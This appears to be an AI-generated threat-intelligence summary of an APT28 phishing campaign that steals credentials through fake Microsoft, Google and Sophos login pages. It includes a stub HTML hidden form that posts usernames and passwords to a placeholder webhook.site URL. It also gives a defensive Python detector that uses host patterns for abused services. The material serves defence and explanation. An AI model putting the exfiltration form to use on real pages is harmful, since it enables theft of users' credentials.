Russian APT28 Runs Credential-Stealing Campaign Targeting Energy and Policy Organizations
These articles are AI-generated summaries. Please check the original sources for full details.
Russian state-sponsored threat actors, specifically APT28 (BlueDelta), have been linked to a credential harvesting campaign targeting energy and policy organizations in Turkey, Europe, North Macedonia, and Uzbekistan. The campaign, active since February 2025, leverages fake login pages mimicking Microsoft, Google, and Sophos VPN, redirecting users to legitimate sites after credential capture.
Why This Matters
Ideal security models assume user vigilance and rapid patch deployment, but attackers exploit the human element with sophisticated phishing tactics. Credential harvesting represents a low-cost, high-yield attack vector for state-sponsored actors; successful breaches can lead to long-term access and significant data exfiltration, potentially costing organizations millions in remediation and lost intellectual property.
Key Insights
- APT28 linked to GRU: The group is associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).
- Webhook Abuse: Attackers utilize services like Webhook[.]site, InfinityFree, and ngrok to host phishing pages and exfiltrate data.
- Lure Documents: Campaigns employed legitimate PDF documents, including publications from the Gulf Research Center and ECCO, to increase credibility.
Working Example
```html
<!-- Example of a hidden HTML form element used to transmit credentials -->
<form action="https://webhook.site/your_webhook_url" method="post" style="display:none;">
  <input type="hidden" name="username" value="">
  <input type="hidden" name="password" value="">
  <input type="submit" value="Submit">
</form>
<script>
document.querySelector('form').addEventListener('submit', function(event) {
  event.preventDefault();
  // Code to capture username and password values
  // and populate hidden form fields
  // ...
  this.submit();
});
</script>
```
Practical Applications
- Use Case: Energy organizations in Turkey are targeted with lures related to regional geopolitical events to increase phishing success rates.
- Pitfall: Relying solely on user training without multi-factor authentication (MFA) leaves organizations vulnerable to credential-harvesting attacks.
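The webhook abuse and the capture-then-redirect behaviour described above suggest a simple detection: a client that POSTs to a throwaway hosting or tunnelling service and, seconds later, loads a legitimate Microsoft or Google login page. The following is an added example (not code from the original article or from any referenced vendor) that runs that check over constructed proxy log lines; the ngrok and InfinityFree domain patterns and the log format are assumptions.

```python
import re
from datetime import datetime, timedelta
# Hosting/tunnelling services named in the summary as abused (webhook.site, ngrok,
# InfinityFree); the ngrok and InfinityFree domain patterns are assumptions.
ABUSED_HOST_PATTERNS = [
    r"(^|\.)webhook\.site$",
    r"(^|\.)ngrok(-free)?\.app$",
    r"(^|\.)infinityfreeapp\.com$",
]
# Legitimate login destinations the fake pages redirect victims to after capture.
LEGIT_LOGIN_HOSTS = {"login.microsoftonline.com", "accounts.google.com"}

# Assumed proxy log format: "timestamp client method url status".
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) https?://(?P<host>[^/\s]+)\S* (?P<status>\d{3})$")

def parse_line(line):
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.fromisoformat(d["ts"])
    return d

def is_abused_host(host):
    return any(re.search(p, host.lower()) for p in ABUSED_HOST_PATTERNS)

def find_harvest_sequences(lines, window=timedelta(seconds=30)):
    """Return (client, exfil_host, redirect_host) for each POST to an abused host
    followed within `window` by the same client loading a legitimate login page."""
    events = [e for e in map(parse_line, lines) if e]
    hits = []
    for i, e in enumerate(events):
        if e["method"] != "POST" or not is_abused_host(e["host"]):
            continue
        for f in events[i + 1:]:
            if f["ts"] - e["ts"] > window:
                break
            if f["client"] == e["client"] and f["host"] in LEGIT_LOGIN_HOSTS:
                hits.append((e["client"], e["host"], f["host"]))
                break
    return hits

# Constructed sample proxy log lines (not real traffic).
SAMPLE_LOG = [
    "2025-03-04T09:15:01 10.0.0.17 GET https://example-lure.infinityfreeapp.com/vpn/login.html 200",
    "2025-03-04T09:15:20 10.0.0.17 POST https://webhook.site/00000000-0000-0000-0000-000000000000 200",
    "2025-03-04T09:15:22 10.0.0.17 GET https://login.microsoftonline.com/common/oauth2/authorize 200",
    "2025-03-04T09:20:00 10.0.0.42 POST https://intranet.example.internal/submit 302",
    "2025-03-04T09:20:03 10.0.0.42 GET https://accounts.google.com/ 200",
]
```

Each returned tuple is a candidate for alerting; the second client's POST goes to an internal host, so its later Google visit is not flagged.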